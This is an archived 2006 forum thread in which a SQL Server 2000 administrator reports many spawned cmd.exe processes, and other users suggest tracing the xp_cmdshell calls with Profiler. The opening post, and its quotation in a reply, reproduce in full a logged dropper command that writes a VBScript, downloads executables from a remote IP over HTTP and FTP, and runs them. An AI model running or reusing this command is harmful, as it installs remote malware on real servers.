|
Home > Archive > MS SQL Server > December 2006 > machine slow performance
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
machine slow performance
|
|
| bass_ua 2006-12-13, 7:12 pm |
| I have discovered recently that the sql server 2000 sp4 has spawned a lot of
cmd.exe processes.
Event viewer is full of events like:
8128 :
Using 'xplog70.dll' version '2000.80.760' to execute extended stored
procedure 'xp_cmdshell'.
the parameter cmd,exe was called:
C:\WINDOWS\system32\
cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET =
CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data =
CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.[color=darkred]
adSaveCreateOverWrit
e = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type =
adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
adSaveCreateOverWrit
e>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
now i'm out of mind how to stop this.
Can anyone help me?
| |
| Tibor Karaszi 2006-12-13, 7:12 pm |
| SQL Server does not do this by itself. It is either a job or some application that does this. I
suggest you use Profiler to track down who is calling these xp_cmdshell executions.
--
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www. solidqualitylearning
.com/
"bass_ua" <u30195@uwe> wrote in message news:6ab4e8b03613c@u
we...
>I have discovered recently that the sql server 2000 sp4 has spawned a lot of
> cmd.exe processes.
> Event viewer is full of events like:
> 8128 :
> Using 'xplog70.dll' version '2000.80.760' to execute extended stored
> procedure 'xp_cmdshell'.
>
> the parameter cmd,exe was called:
> C:\WINDOWS\system32\
cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
> vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
> vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
> LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET =
> CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data =
> CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
> HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.
> adSaveCreateOverWrit
e = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type =
> adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
> ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
> adSaveCreateOverWrit
e>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
> vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
> exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
>
> now i'm out of mind how to stop this.
> Can anyone help me?
>
| |
| Steve Dassin 2006-12-13, 7:12 pm |
| "Tibor Karaszi" <tibor_please.no. email_karaszi@hotmai
l.nomail.com> wrote in
message news:OtyZQntHHHA.2632@TK2MSFTNGP06.phx.gbl...
> SQL Server does not do this by itself. It is either a job or some
> application that does this. I suggest you use Profiler to track down who
> is calling these xp_cmdshell executions.
'TRACK DOWN' ...is this a police action??
Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
You wanna come and get me? You gonna bring the MVP brigade? Armed?
Well I'll be waiting for ya. I'm not frightened by the shell game.
-:)
best wishes for the holidays,
steve
| |
| Tibor Karaszi 2006-12-13, 7:12 pm |
| LOL
Bring it on, Steve. ;-)
> Ok, Rac uses xp_cmdshell and regularly.
Ahh, I didn't know that. You think this one was RAC? I tend to be suspicious when I see a lot of
xp_cmdshell calls, but that it not the same as saying that there aren't good/smart/valid reasons to
use it.
> best wishes for the holidays,
And the same to you! :-)
--
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www. solidqualitylearning
.com/
"Steve Dassin" <steve@nospamrac4sql.net> wrote in message
news:uK8aDjwHHHA.1264@TK2MSFTNGP06.phx.gbl...
> "Tibor Karaszi" <tibor_please.no. email_karaszi@hotmai
l.nomail.com> wrote in message
> news:OtyZQntHHHA.2632@TK2MSFTNGP06.phx.gbl...
>
> 'TRACK DOWN' ...is this a police action??
> Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
> You wanna come and get me? You gonna bring the MVP brigade? Armed?
> Well I'll be waiting for ya. I'm not frightened by the shell game.
>
>
>
> -:)
>
> best wishes for the holidays,
> steve
>
|
|
|
|
|